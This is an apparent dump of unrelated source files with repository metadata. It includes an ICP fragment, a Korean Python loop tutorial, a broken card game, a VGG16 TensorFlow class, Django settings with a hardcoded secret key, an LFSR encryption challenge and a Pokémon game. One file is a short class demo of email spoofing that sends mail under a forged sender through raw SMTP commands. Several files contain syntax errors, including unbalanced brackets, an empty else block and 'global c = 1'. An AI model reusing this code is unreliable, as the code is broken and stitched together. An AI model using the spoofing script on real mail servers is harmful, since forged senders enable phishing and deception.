init_pose: (m+1)x(m+1) homogeneous transformation max_iterations: exit algorithm after max_iterations tolerance: convergence criteria Output: T: final homogeneous transformation that maps A on to B distances: Euclidean distances (errors) of the nearest neighbor i: number of iterations to converge ''' assert A.shape == B.shape # get number of dimensions m = A.shape[1] # make points homogeneous, copy them to maintain the originals src = np.ones((m+1,A.shape[0])) dst = np.ones((m+1,B.shape[0])) src[:m,:] = np.copy(A.T) dst[:m,:] = np.copy(B.T) # apply the initial pose estimation if init_pose is not None: src = np.dot(init_pose, src) prev_error = 0 for i in range(max_iterations): # find the nearest neighbors between the current source and destination points # distances, indices = nearest_neighbor(src[:m,:].T, dst[:m,:].T) # compute the transformation between the current source and nearest destination points T,_,_ = best_fit_transform(src[:m,:].T, dst[:m,:].T) # update the current source src = np.dot(T, src) # check error # mean_error = np.mean(distances) # if np.abs(prev_error - mean_error) < tolerance: # break # prev_error = mean_error # calculate final transformation T,_,_ = best_fit_transform(A, src[:m,:].T) return T
[ "abelttitus1998@gmail.com" ]
abelttitus1998@gmail.com
820fb21b55c430e223b4c4d6dff810df79a6d5e4
ac6fa9d25f1b41fe3cae0881711ad7f394d644ac
/client.py
4b6e196871d934e08f143b08541d92cd522749a7
[]
no_license
raman-chumber/Email-Spoofing-in-Python
6b78926a65cf504eda4386a8116eea6de4969c8d
8cbaaa1692de677a0ba8b48556e5a4a15774357b
refs/heads/master
2020-04-17T10:34:43.625358
2019-10-24T03:08:03
2019-10-24T03:08:03
166,505,977
3
0
null
null
null
null
UTF-8
Python
false
false
1,733
py
from socket import * msg = "\r\n I love computer networks!" endmsg = "\r\n.\r\n" server = "localhost" port = 25 emailFrom = "mallroy@notexisting.org" emailto = "ramanchumber1@gmail.com" # Choose a mail server mailserver = (server, port) #Create socket called clientSocket and establish a TCP connection with mailserver clientSocket = socket(AF_INET, SOCK_STREAM) clientSocket.connect(mailserver) recv = clientSocket.recv(1024) print(recv) if recv[:3] != '220': print('220 reply not received from server.') # Send HELO command and print server response. heloCommand = 'HELO Alice\r\n' clientSocket.send(heloCommand) recv1 = clientSocket.recv(1024) print("Message after HELO command:" + recv1) if recv1[:3] != '250': print('250 reply not received from server.') # Send Mail From command and print server response. mailFrom = "MAIL FROM:" + emailFrom + "\r\n" clientSocket.send(mailFrom) recv2 = clientSocket.recv(1024) print("After MAIL FROM command: " +recv2) # Send RCPT To command and print server response rcptTo = "RCPT TO:" + emailto + "\r\n" clientSocket.send(rcptTo) recv3 = clientSocket.recv(1024) print("After RCPT TO command: " +recv3) # Send DATA command and print server response. data = "DATA\r\n" clientSocket.send(data) recv4 = clientSocket.recv(1024)) print("After DATA command: " +recv4) # Send message data subject = "Subject: This is Email Spoofing demo for CSC 255 class.\r\n\r\n" clientSocket.send(subject) clientSocket.send(msg) clientSocket.send(endmsg) recv_msg = clientSocket.recv(1024) print("Response after sending message body:"+recv_msg) # Send Quit command and get server response. clientSocket.send("QUIT\r\n") recv5 = clientSocket.recv(1024) print(recv5) clientSocket.close()
[ "ramanchumber1@gmail.com" ]
ramanchumber1@gmail.com
7de882a045d7bd2506036e98940a411e3359f43f
73b6778f2d6c013371a1b1a7d35de69b0562062f
/FOR문.py
306642f0413af7c2643dbb9d9f08a4b21884f204
[]
no_license
jkimtokyo/python
94c94e683513d55c96cc60827f596683693216d6
50caf5e06ca688b99c8192b2c7f10da08872d368
refs/heads/master
2021-01-18T20:58:31.035214
2016-12-20T03:24:00
2016-12-20T03:24:00
68,670,648
0
0
null
null
null
null
UTF-8
Python
false
false
3,945
py
# 반복문, 기본적 구문은 FOR 변수 in 리스트 (튜플 혹은 문자열): list = ['one', 'two', 'three'] for i in list: print(i) # 출력값은 one two three list = [(1, 2), (3, 4)] for (a, b) in list: print(a + b) # 3 7 list의 요소값이 튜플이기 때문에 각각의 요소들이 자동으로 (a,b) 변수에 대입된다. # FOR문의 응용 # 차례차례 참 거짓 판단 point = [90, 47, 62] for i in point: if i >= 60: print('PASS') else: print('FAIL') # PASS FAIL PASS # FOR 그리고 continue, for 문장 내에서 '참일 때 continue'를 만나면 for 문의 처음으로 돌아가 다음 것으로. 무시하고 'NEXT' point = [91, 23, 47, 51] num = 0 for i in point: num = num + 1 if i < 50: continue print('%d' % num, 'SUCCESS') # 1 SUCCESS 4 SUCCESS # FOR 그리고 range 함수, range 함수는 0부터 () 안의 숫자 미만까지를 객체로 만든다. range(2)라면 0,1 시작과 끝을 표기하려면 range(1,3) 이건 1,2 sum = 0 for i in range(10): sum = sum + i print(sum) # sum = 0+0=0,0+1=1,1+2=3,3+3=6,6+4=10,10+5=15,15+6=21,21+7=28,28+8=36,36+9=45 num = 0 for i in range(1, 5): # 1 포함 4까지 num = num + i print(num) # num = 0+1=1,1+2=3,3+3=6,6+4=10 # range와 len 함수 조합형 range(len()), len 함수는 리스트 요소의 갯수를 돌려주는 함수 list = [40, 50, 60] print(len(list)) # 3 list = [91, 23, 47, 51] num = 0 for i in range(len(list)): # = range(4) num = num + 1 if list[i] < 50: continue # 이건... 리스트형을 좀 봐야겠군. print('%d' % num, 'SUCCESS') # 1 SUCCESS 4 SUCCESS # FOR, Range를 2개 반복해서 구구단 만들기 for x in range(1, 10): for y in range(2, 10): # 들여쓰기 안하면 오류 # print(x*y) # 이렇게 들여쓰기 안하면 오류 print(x * y) # 이렇게 두번째 FOR 아래 들여쓰기 해야 됨 # range()에서 숫자들이 어떻게 대입되는가.. x가 1일 때 다음 y의 2,3,4...9까지를 반복 후 x 2가 또 다음 FOR for x in range(2, 10): for y in range(1, 10): # 들여쓰기 안하면 오류 print(x * y, end='') # end='' 이것을 삽입해 주면 한줄로 출력된다 246810121416183691215182124274812162024283236510152 # print('') # '' 삽입해 주면 결과값이 한 줄씩 출력된다 print('') # 들여쓰기를 FOR에 맞춰주면 24681012141618 줄바꿈 369121518212427 형태 # 리스트 내포(LIST Comprehension) 문장 # 문법은 [식 for i in list] a = [1,2] b = [i for i in a] # 출력값은 [1,2] 이건 식이 없는... a = [1, 2, 3] b = [i+1 for i in a] # 1)for i in a 하나씩 가져와서 2)i+1 대입 print(b) print('------------') # 리스트 내포(LIST Comprehension) 문장에는 if 문도 들어갈 수 있다 [식 for i in list if 조건식] a = [3,4,5,6,7] b = [i for i in a if i%2 == 0] # list 하나씩 들고 와서 그것이 만약 짝수(2로 나눠 나머지가 0이라면(i%2==0)) i print(b) # [4, 6] c = [i*3 for i in a if i%2 == 1] # list 하나씩 들고 와서 그것이 홀수면 if i%2 == 1 i*3 print(c) # [9, 15, 21] f = [i+1 for i in a if i==7] # 8, 왜 7이 아닌 8이 출력되는가?? # 구문해석의 순서: 1)for i in a : 리스트에 있는 i 들을 순서대로 가져온다. 2)if i==7 그 중 7과 같은... 3)i+1 계산. # 리스트 내포 문장에서 복수의 FOR IF 사용할 수 있다 a = [1,2,3,4,5] b = [4,5,6,7,8] c = [i+j for i in a if i>1 for j in b if i==j] # 들여쓰기 해야 함 # 1)for i in a a의 리스트들 > 2)1보다 큰 a 2,3,4 # 3)for j in b : 1보다 큰 a의 2,3,4를 아랫 줄 b의 4,5,6,7과 참조하여 - # 4)i == j 조건은 4와 5가 해당 # 5)4+4, 5+5 출력값은 [8, 10] print(c) # 8 a = [1,2,3,4,5] b = [1,2,3,4,5] c = [j+1 for i in a if i == 2 for j in b if i == j] # for i in a > if i == 2 > 그 아래 FOR 문 for j in b > i == j > j+1 print(c) # 3
[ "jkimtokyo@gmail.com" ]
jkimtokyo@gmail.com
a1f3bc4d55d184b81e91982984e3e08d1fb53fe5
b4659495b297910d1a8896a2da13c9fd4cd204db
/FinalProject/theIdiot.py
9606918865058db37add58c8cab01916f9c3e42b
[]
no_license
rahdirs11/Pirple-pythonIsEasy
864b2320434ae20fc45f41a7ddfd8a93884542f6
515421cb2db1d300bf9f5c603f06e49f43dd2e84
refs/heads/master
2023-04-15T04:20:42.090503
2021-05-02T02:41:04
2021-05-02T02:41:04
363,009,250
0
0
null
null
null
null
UTF-8
Python
false
false
6,430
py
#!/usr/bin/env python3 ''' Rules: -> Take a deck -> 2 is a wild card -> 10 is a card used to burn the deck -> A > K > Q > J -> 4 cards of the same suit burns the deck -> If you can't beat the cards with a number >= the value of the topmost card on the deck, or with 2 or 10, you get to take all the cards from the pile Board: -> 3 cards face-down, for both the players -> 3 cards face-up, on top of the face-down cards -> 7 playable cards for both the players -> You can swap the face-up cards for any of the cards from your playable cards -> The player with most number of 3's gets to start the game -> You get to n cards, and pick n cards from the deck ''' import random, os class Deck: def __init__(self): ''' Creates a new deck, of 52 cards ''' self.cards = dict() suites = ['diamonds', 'hearts', 'clubs', 'spades'] for i in range(4): self.cards[suites[i]] = list(range(1, 15)) @property def numberOfCards(self): ''' To return the number of cards currently in the deck ''' count = 0 for s in self.cards: count += len(self.cards.get(s)) return count def __repr__(self): return f'class <Deck>: {self.numberOfCards} cards' class Player: def __init__(self): self.faceDownCards = dict() self.playableCards = dict() self.faceUpCards = dict() def chooseCards(self, n: int, deck: Deck) -> dict: ''' This method randomly picks 'n' cards from a deck of cards. The cards in the deck are updated whenever a card is picked. ''' cards = {} for i in range(n): suiteChoice = random.choice(list(deck.cards.keys())) value = random.choice(deck.cards[suiteChoice]) deck.cards[suiteChoice].remove(value) cards[suiteChoice] = cards.get(suiteChoice, []) cards[suiteChoice].append(value) return cards def printCards(self): print(f'Face Down cards: {self.faceDownCards}\nFace up cards: {self.faceUpCards}\nPlayable Cards: {self.playableCards}') def setFaceDownCards(self, deck): self.faceDownCards = self.chooseCards(3, deck) def setFaceUpCards(self, deck): self.faceUpCards = self.chooseCards(3, deck) def setPlayableCards(self, deck): self.playableCards = self.chooseCards(7, deck) def allocateCards(self, deck): ''' Initializes the set of cards for each player(both the players in this program as it is just a 2-player game) ''' self.setFaceDownCards(deck) self.setFaceUpCards(deck) self.setPlayableCards(deck) def whoStarts(value: int, p1: Player, p2: Player) -> int: if value > 14: print('Unexpected Scenario!!') return -1 countP1, countP2 = 0, 0 for s in p1.playableCards: countP1 += p1.playableCards[s].count(value) for s in p2.playableCards: countP2 += p2.playableCards[s].count(value) if countP1 > countP2: return 1 elif countP2 > countP1: return 2 else: return whoStarts(value + 1, p1, p2) def chooseCard_s(): print('Card Count:\t', end="") count = int(input()) print('Enter value:\t', end="") value = int(input()) print('Enter the suits:') suitSet = set() tempStack = [] for _ in range(count): s = input().lower() if player1.playable[s].count(value) != 0: tempStack.append([s, value]) suitSet.add(s) else: break return count, value, suitSet, tempStack def play(player1, player2, deck): turn = whoStarts(3, player1, player2) if turn == -1: exit(1) boardStack = [] emptyDeck = False gameOver = False errorCount = 0 while not gameOver: if deck.numberOfCards == 0: emptyDeck = True # errorCount = 0 if errorCount if turn == 1: if errorCount == 3: print('YOU LOOSE!\nPLAYER {1 if turn == 2 else 2} WINS') os.sleep(2) exit(0) os.system('clear' if sys.platform == 'linux' else 'cls') print(f'PLAYER {turn} - MAKE YOUR MOVE!'.center(35)) count, value, suitSet, tempStack = chooseCard_s() if len(suitSet) != count: print('INVALID MOVE!!\nTRY AGAIN') errorCount += 1 os.sleep(2) else: errorCount = 0 for ts in tempStack: player1.playable[ts[0]].remove(ts[-1]) if not emptyDeck: for i in range(count): suit = random.choice(deck.cards.keys()) value = random.choice(deck.cards[suit]) deck.cards[suit].remove(value) player1.playable[suit].append(value) turn = 2 else: os.system('clear' if sys.platform == 'linux' else 'cls') print(f'PLAYER {turn} - MAKE YOUR MOVE!'.center(35)) count, value, suitSet, tempStack = chooseCard_s() if len(suitSet) != count: print('INVALD MOVE!!\nTRY AGAIN') errorCount += 1 os.sleep(2) else: errorCount = 0 for ts in tempStack: player1.playable[ts[0].remove(ts[-1]) if not emptyDeck: for i in range(count): suit = random.choice(deck.cards.keys()) value = random.choice(deck.cards[suit]) deck.cards[suit].remove(value) player1.playable[suit].append(value) else: if __name__ == '__main__': deck = Deck() player1 = Player() player1.allocateCards(deck) player2 = Player() player2.allocateCards(deck) turn = whoStarts(3, player1, player2) if turn == -1: exit(1) else: play(player1, player2, deck)
[ "iamsridhar11@gmail.com" ]
iamsridhar11@gmail.com
c248e46b22276b4df7ea0afdb538bcfe8fb13aec
7498a33b5e6ff9b9ebad3f309a750363c1337d9d
/DeepLearning/VGG16_Class.py
b7e199a184bc419e99ac286a02d5387a7876f0bb
[]
no_license
jsysley/Code
a603e6677eb07b0a4a192134276b86aeb00b2a58
3364cc11862581168ef1e72cb571356ec44c169b
refs/heads/master
2021-01-12T13:57:24.646498
2017-08-07T01:36:20
2017-08-07T01:36:20
69,252,536
1
1
null
null
null
null
UTF-8
Python
false
false
10,095
py
# -*- coding: utf-8 -*- """ Created on Sat May 20 14:05:12 2017 @author: jsysley """ import time import tensorflow as tf import matplotlib.pyplot as plt class VGG16: def __init__(self,lr,iterations,batch_size,n_inputs, n_classes,n,display_epoch = 1,keep_prob = 1): # Hyperparameters self.lr = lr self.keep_prob = keep_prob self.iterations = iterations self.batch_size = batch_size self.n_inputs = n_inputs self.n_classes = n_classes self.n = n self.display_epoch = display_epoch self.dropout = tf.placeholder(tf.float32) self.build() # conv # input_op 输入;name 层名;kh 卷积核高,kw 卷积核宽;n_out 卷积核数量;dh 步长的高;dw 步长的宽;p 参数列表 def conv_op(self,input_op, name, kh, kw, n_out, dh, dw, p): n_in = input_op.get_shape()[-1].value # 获得通道数 with tf.name_scope(name) as scope: # weights kernel = tf.get_variable(scope + "w", shape = [kh, kw, n_in, n_out], dtype = tf.float32, initializer = tf.contrib.layers.xavier_initializer_conv2d())#Xavier初始化 # 卷积核 conv = tf.nn.conv2d(input_op, kernel, (1, dh, dw, 1), padding = 'SAME') # 偏置项 bias_init_val = tf.constant(0.0, shape = [n_out], dtype = tf.float32) biases = tf.Variable(bias_init_val, trainable = True, name = 'b') # 求和 z = tf.nn.bias_add(conv, biases) # 激励函数 activation = tf.nn.relu(z, name = scope) p += [kernel,biases] return activation # fc # input_op 输入;name 层名;n_out 卷积核数量;p 参数列表 def fc_op(self,input_op, name, n_out, p): n_in = input_op.get_shape()[-1].value with tf.name_scope(name) as scope: # weights kernel = tf.get_variable(scope + "w", shape = [n_in, n_out], dtype = tf.float32, initializer = tf.contrib.layers.xavier_initializer()) # bias biases = tf.Variable(tf.constant(0.1, shape = [n_out], dtype = tf.float32), name = 'b')#避免死亡节点 # 激励 activation = tf.nn.relu_layer(input_op, kernel, biases, name = scope) p += [kernel, biases] return activation # pooling # input_op 输入;name 层名;kh 卷积核高,kw 卷积核宽;dh 步长的高;dw 步长的宽;p 参数列表 def mpool_op(self,input_op, name, kh, kw, dh, dw): return tf.nn.max_pool(input_op, ksize = [1, kh, kw, 1], strides = [1, dh, dw, 1], padding = 'SAME', name = name) def structure(self): self.p = [] # input and output self.xs = tf.placeholder("float", [None, self.n_inputs]) self.ys = tf.placeholder("float", [None, self.n_classes]) # reshape x_ = tf.reshape(self.xs, [-1,224,224,3]) # 第一段卷积层 conv1_1 = self.conv_op(x_, name = "conv1_1", kh = 3, kw = 3, n_out = 64, dh = 1, dw = 1, p = self.p) conv1_2 = self.conv_op(conv1_1, name = "conv1_2", kh = 3, kw = 3, n_out = 64, dh = 1, dw = 1, p = self.p) pool1 = self.mpool_op(conv1_2, name = "pool1", kh = 2, kw = 2, dw = 2, dh = 2) #第二段卷积层 conv2_1 = self.conv_op(pool1, name = "conv2_1", kh = 3, kw = 3, n_out = 128, dh = 1, dw = 1, p = self.p) conv2_2 = self.conv_op(conv2_1, name = "conv2_2", kh = 3, kw = 3, n_out = 128, dh = 1, dw = 1, p = self.p) pool2 = self.mpool_op(conv2_2, name = "pool2", kh = 2, kw = 2, dh = 2, dw = 2) #第三段卷积层 conv3_1 = self.conv_op(pool2, name = "conv3_1", kh = 3, kw = 3, n_out = 256, dh = 1, dw =1, p = self.p) conv3_2 = self.conv_op(conv3_1, name = "conv3_2", kh = 3, kw = 3, n_out = 256, dh = 1, dw = 1, p = self.p) conv3_3 = self.conv_op(conv3_2, name = "conv3_3", kh = 3, kw = 3, n_out = 256, dh = 1, dw = 1, p = self.p) pool3 = self.mpool_op(conv3_3, name = "pool3", kh = 2, kw = 2, dh = 2, dw = 2) #第四段卷积层 conv4_1 = self.conv_op(pool3, name = "conv4_1", kh = 3, kw = 3, n_out = 512, dh = 1, dw = 1, p = self.p) conv4_2 = self.conv_op(conv4_1, name = "conv4_2", kh = 3, kw = 3, n_out = 512, dh = 1, dw = 1, p = self.p) conv4_3 = self.conv_op(conv4_2, name = "conv4_3", kh = 3, kw = 3, n_out = 512, dh = 1, dw = 1, p = self.p) pool4 = self.mpool_op(conv4_3, name = "pool4", kh = 2, kw = 2, dh = 2, dw = 2) #第五段卷积层 conv5_1 = self.conv_op(pool4, name = "conv5_1", kh = 3, kw = 3, n_out = 512, dh = 1, dw = 1, p = self.p) conv5_2 = self.conv_op(conv5_1, name = "conv5_2", kh = 3, kw = 3, n_out = 512, dh = 1, dw = 1, p = self.p) conv5_3 = self.conv_op(conv5_2, name = "conv5_3", kh = 3, kw = 3, n_out = 512, dh = 1, dw = 1, p = self.p) pool5 = self.mpool_op(conv5_3, name = "pool5", kh = 2, kw = 2, dw = 2, dh = 2) #将第五段卷积层输出结果抽成一维向量 shp = pool5.get_shape() flattended_shape = shp[1].value * shp[2].value * shp[3].value resh1 = tf.reshape(pool5, [-1, flattended_shape], name = "resh1") #三个全连接层 fc6 = self.fc_op(resh1, name = "fc6", n_out = 4096, p = self.p) fc6_drop = tf.nn.dropout(fc6, self.dropout, name = "fc6_drop") fc7 = self.fc_op(fc6_drop, name = "fc7", n_out = 4096, p = self.p) fc7_drop = tf.nn.dropout(fc7, self.dropout, name = "fc7_drop") self.pred = self.fc_op(fc7_drop, name = "fc8", n_out = self.n_classes, p = self.p) self.softmax = tf.nn.softmax(self.pred) # 使用SoftMax分类器输出概率最大的类别 self.pred_label = tf.argmax(self.softmax, 1) def compute_loss(self): self.loss_function = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.pred, labels=self.ys)) self.optimizer = tf.train.AdamOptimizer(self.lr).minimize(self.loss_function) def build(self): # build net self.structure() # build loss self.compute_loss() def train(self,xdata,ydata): init = tf.global_variables_initializer() self.sess = tf.Session() with self.sess.as_default() as sess: sess.run(init) # Training cycle all_loss = [] total_batch = int(self.n / self.batch_size) for epoch in range(self.iterations): avg_loss = 0. # Loop over all batches for i in range(total_batch): batch_x = xdata[(i * self.batch_size):((i + 1) * self.batch_size)] batch_y = ydata[(i * self.batch_size):((i + 1) * self.batch_size)] # Run optimization op (backprop) and cost op (to get loss value) _,loss = sess.run([self.optimizer, self.loss_function], feed_dict={self.xs: batch_x,self.ys: batch_y,self.dropout:self.keep_prob}) # Compute average loss avg_loss += loss / total_batch all_loss.append(avg_loss) # Display logs per epoch step if epoch % self.display_epoch == 0: print(time.strftime('%Y-%m-%d,%H:%M:%S',time.localtime()),"VGG-Epoch:", '%04d' % (epoch+1), "cost= ","%.9f" % avg_loss) print("Optimization Finished!") plt.figure() plt.plot(list(range(len(all_loss))), all_loss, color = 'b') plt.show() def test(self,xdata,ydata): with self.sess.as_default() as sess: # Test model correct_prediction = tf.equal(tf.argmax(self.pred, 1), tf.argmax(self.ys, 1)) # Calculate accuracy accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float")) print("Accuracy:", accuracy.eval({self.xs: xdata, self.ys: ydata,self.dropout:1.0})) def predict(self,tdata): with self.sess.as_default() as sess: prob = sess.run(self.pred,feed_dict = {self.xs:tdata,self.dropout:1.0}) return prob def save(self,save_path): saver = tf.train.Saver() with self.sess.as_default() as sess: print("Save to path: " + saver.save(sess,save_path)) def load(self,load_path): saver = tf.train.Saver() self.sess = tf.Session() with self.sess.as_default() as sess: saver.restore(sess, load_path) print("Load from path: " + load_path) #============================================================================== #============================================================================== sess = tf.Session() images = tf.Variable(tf.random_normal([32*3, #batch_size, 224*224*3], #image_size, dtype = tf.float32, stddev = 1e-1)) init = tf.global_variables_initializer() sess.run(init) images = sess.run(images) from tensorflow.examples.tutorials.mnist import input_data # number 1 to 10 data mnist = input_data.read_data_sets('MNIST_data', one_hot=True) images_labels = mnist.train.labels[:32*3] vgg = VGG16(lr = 1e-4,keep_prob = 1,iterations = 1,batch_size = 32, n_inputs = 224*224*3,n_classes = 10,n = 32*3,display_epoch = 1) vgg.train(images,images_labels) vgg.predict(images) vgg.test(images,images_labels) vgg.save(r'F:/code/python3/DeepLearning/template/record/vgg.ckpt') vgg1 = VGG16(lr = 1e-4,keep_prob = 1,iterations = 1,batch_size = 100, n_inputs = 784,n_classes = 10,n = 55000,display_epoch = 1) vgg1.load(r'F:/code/python3/DeepLearning/template/record/vgg.ckpt') vgg1.test(mnist.test.images,mnist.test.labels)
[ "237149516@qq.com" ]
237149516@qq.com
ac01b0964e31f632558c44346006f03235d2cbaf
5021cd17ce5fb52f7859d69ffa660c1393820fea
/34.py
273b15775856ae587f4dd416663870f2c79d0f4c
[]
no_license
slavo3dev/python_100_exercises
720e4f76de670fa969c9d62bddee1db20caf24f1
2983131a2a3ec40bbf3460a2e1baed57c6514e6a
refs/heads/master
2021-08-23T05:22:21.673477
2017-12-03T16:14:48
2017-12-03T16:14:48
null
0
0
null
null
null
null
UTF-8
Python
false
false
407
py
# Question: The following script throws a NameError in the last line saying that c is not defined. Please fix the function so that there is no error and the last line is able to print out the value of c (i.e. 1 ). def foo(): global c = 1 return c foo() print(c) # c is not defined becuse variable is inside the fucntion foo, and c is a local var # we can declare var c with global key word
[ "slavo@mimicom24.com" ]
slavo@mimicom24.com
0705dd5c07bfad91663f42c75cf7aa1bb9b44d02
e3efe48efd5f5433f8488e647139b5594e6f2101
/hackernews/settings.py
493e188cb34c309d5c77377e0a1e5e57970201c6
[]
no_license
kev-luo/hackernews-python
fadbc7043d172ec03a35cf369ad839f2c342b900
7524e400dbfa2b4983bb8de28816a1b7b034f2b3
refs/heads/main
2023-05-08T22:46:59.030296
2021-06-06T17:33:47
2021-06-06T17:33:47
374,679,955
0
0
null
null
null
null
UTF-8
Python
false
false
3,482
py
""" Django settings for hackernews project. Generated by 'django-admin startproject' using Django 2.1.4. For more information on this file, see https://docs.djangoproject.com/en/2.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.1/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = "ffl8jlg6wf6(*23n@v+s+((r$c-it$(27m!71hv0&&7y2)j@51" # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ "django.contrib.admin", "django.contrib.auth", "django.contrib.contenttypes", "django.contrib.sessions", "django.contrib.messages", "django.contrib.staticfiles", "graphene_django", "links.apps.LinksConfig", "corsheaders", ] MIDDLEWARE = [ "django.middleware.security.SecurityMiddleware", "django.contrib.sessions.middleware.SessionMiddleware", "django.middleware.common.CommonMiddleware", "django.middleware.csrf.CsrfViewMiddleware", "django.contrib.auth.middleware.AuthenticationMiddleware", "graphql_jwt.middleware.JSONWebTokenMiddleware", "django.contrib.messages.middleware.MessageMiddleware", "django.middleware.clickjacking.XFrameOptionsMiddleware", "corsheaders.middleware.CorsMiddleware", ] ROOT_URLCONF = "hackernews.urls" TEMPLATES = [ { "BACKEND": "django.template.backends.django.DjangoTemplates", "DIRS": [], "APP_DIRS": True, "OPTIONS": { "context_processors": [ "django.template.context_processors.debug", "django.template.context_processors.request", "django.contrib.auth.context_processors.auth", "django.contrib.messages.context_processors.messages", ], }, }, ] WSGI_APPLICATION = "hackernews.wsgi.application" # Database # https://docs.djangoproject.com/en/2.1/ref/settings/#databases DATABASES = {"default": {"ENGINE": "django.db.backends.sqlite3", "NAME": os.path.join(BASE_DIR, "db.sqlite3"),}} # Password validation # https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ {"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",}, {"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",}, {"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",}, {"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",}, ] # Internationalization # https://docs.djangoproject.com/en/2.1/topics/i18n/ LANGUAGE_CODE = "en-us" TIME_ZONE = "UTC" USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.1/howto/static-files/ STATIC_URL = "/static/" GRAPHENE = {"SCHEMA": "hackernews.schema.schema", "MIDDLEWARES": ["graphql_jwt.middleware.JSONWebTokenMiddleware"]} AUTHENTICATION_BACKENDS = [ "graphql_jwt.backends.JSONWebTokenBackend", "django.contrib.auth.backends.ModelBackend", ] CORS_ORIGIN_WHITELIST = ["http://localhost:3000"]
[ "kevinluo@Kevins-MacBook-Air.local" ]
kevinluo@Kevins-MacBook-Air.local
ae273d6c7df4668f63223a3a9c09633173817c6f
70bb5993653ae14c3334ad27bfe74ba7fdaff003
/Crypto/Tiny LFSR/Encrypt.py
65830aa1e7ba77fbdb195eb6045647f8c5c775b4
[ "MIT" ]
permissive
CSUAuroraLab/AFCTF2018
b3681b5c14ac2166ae03b57fa29c849eaa91077f
5bcf6da5ab14b4483c4f7068362cbab48512ecfa
refs/heads/master
2021-07-07T01:39:20.678947
2020-07-22T13:25:20
2020-07-22T13:25:20
130,701,722
2
0
null
null
null
null
UTF-8
Python
false
false
990
py
import sys from binascii import unhexlify if(len(sys.argv)<4): print("Usage: python Encrypt.py keyfile plaintext ciphername") exit(1) def lfsr(R, mask): output = (R << 1) & 0xffffffffffffffff i=(R&mask)&0xffffffffffffffff lastbit=0 while i!=0: lastbit^=(i&1) i=i>>1 output^=lastbit return (output,lastbit) R = 0 key = "" with open(sys.argv[1],"r") as f: key = f.read() R = int(key,16) f.close mask = 0b1101100000000000000000000000000000000000000000000000000000000000 a = ''.join([chr(int(b, 16)) for b in [key[i:i+2] for i in range(0, len(key), 2)]]) f=open(sys.argv[2],"r") ff = open(sys.argv[3],"wb") s = f.read() f.close() lent = len(s) for i in range(0, len(a)): ff.write((ord(s[i])^ord(a[i])).to_bytes(1, byteorder='big')) for i in range(len(a), lent): tmp=0 for j in range(8): (R,out)=lfsr(R,mask) tmp=(tmp << 1)^out ff.write((tmp^ord(s[i])).to_bytes(1, byteorder='big')) ff.close()
[ "daddy_hong@foxmail.com" ]
daddy_hong@foxmail.com
529aab4a0e29b33711b5c91b9fc462f6cc37dbe5
5b8bf799d0d4322802168f0aa3cee3950eb0a6a8
/40/my_game.py
3968dba42d678e007f7e958ee958ada2ee2bfc94
[]
no_license
MrCuffe/TGPD2020S2_Demos
675c10f6ea09c870ca415fdcd555068143792321
451c533625473869f53341a19f6e78461fc404bb
refs/heads/main
2023-01-14T05:07:11.298573
2020-11-22T22:58:17
2020-11-22T22:58:17
309,209,182
0
0
null
null
null
null
UTF-8
Python
false
false
26,694
py
# # Snehita's Python Game at Final Submission. The following program starts off with a prologue explaining the game's current situation and the player's primary objective. To begin their quest, new-time players are allocated a Pokémon which is at random. If they wish to change Pokémon, that option is available. Once set, they enter the game's Main Menu system which carries a list of options for players to interact with. When players choose to travel to another location by selecting Option 1, they are faced with battles and Pokémon to capture. The consistency of battle numbers is randomly generated. In battle, players have the option to attack with their designated moves or escape. The chances of escaping the battle are at 50%. If unsuccessful, players lose HP. When players attack the opposing Pokémon and make the Enemy's HP >10 they have the opportunity to capture the opposing Pokémon. Successfully capturing Pokémon is set at a 30% chance. If the Pokémon is successfully captured, they will be asked to keep or release the Pokémon. There will be occasions where players cannot keep the Pokémon as they have reached their maximum collected amount, which is linked to their Level. The battle is deemed over depending on whose HP reaches >5 first. The merchandise store offers players the opportunity to buy medicinal healing potions. A potion costs $50 and will accelerate the Pokémon's HP by 30%. For the potion to be drunk Option 6 from the Menu must be selected. Options 3 and 4 in the Main Menu offers players to view their captured Pokémon and select their Pokémon for upcoming battles. Option 5 is for players to Return Home once situated in a different location. New Bark Town is the defaulted hometown for all players. # Author: Snehita Antony # File: Python Game Code # Version: 4.3 # Email: ANT0001@jmss.vic.edu.au # ENSURE TO DOWNLOAD PYGAME AND ZIP FILES ARE EXTRACTED PRIOR TO PLAYING. # Modules import time # Import time module import pygame # Requires the download of the pygame library import random # Import random variable generator import sys # Program flow control # Open text file;FUNCTION list_type = open('gamedata/type.txt', 'r', # line breaks (Value, Type);FUNCTION encoding='utf-8').read().splitlines() list_attack = open('gamedata/attack.txt', 'r', # line breaks (Value, Type, Attack 1, Attack 2, Attack 3);FUNCTION encoding='UTF-8').read().splitlines() list_pokemon = open('gamedata/pokemon.txt', 'r', # line breaks (Name, Type 1, Type 2, Total, HP, Attack, Defense, Special Attack, Special Defense, Speed);FUNCTION encoding='utf-8').read().splitlines() list_location = open('gamedata/locations.txt', 'r', # line breaks (Name, Pokemon_Meter, Enemy_Enabled, PM_to_Hometown);FUNCTION encoding='utf-8').read().splitlines() list_tips = open('gamedata/tips.txt', 'r', # line breaks (Value, Type);FUNCTION encoding='utf-8').read().splitlines() # Essential Game Variables game_debug = 'NO' # First Pokemon is Selected by Default (Range: 0~4) player_pokemon_selected = 0 # Initial value - No Pokemon Owned player_max_pokemon = 0 # 5 Pokemon Slots, default to Level 1 player_level = [1] * 5 # Initial table for name of Pokemon (Line Number only) player_pokemon_index = ['None'] * 5 # 5 HP values for Pokemon player_hp = [0] * 5 # 5 Experience values for each Pokemon player_exp = [0] * 5 # Initial First Pokemon Type player_type1 = 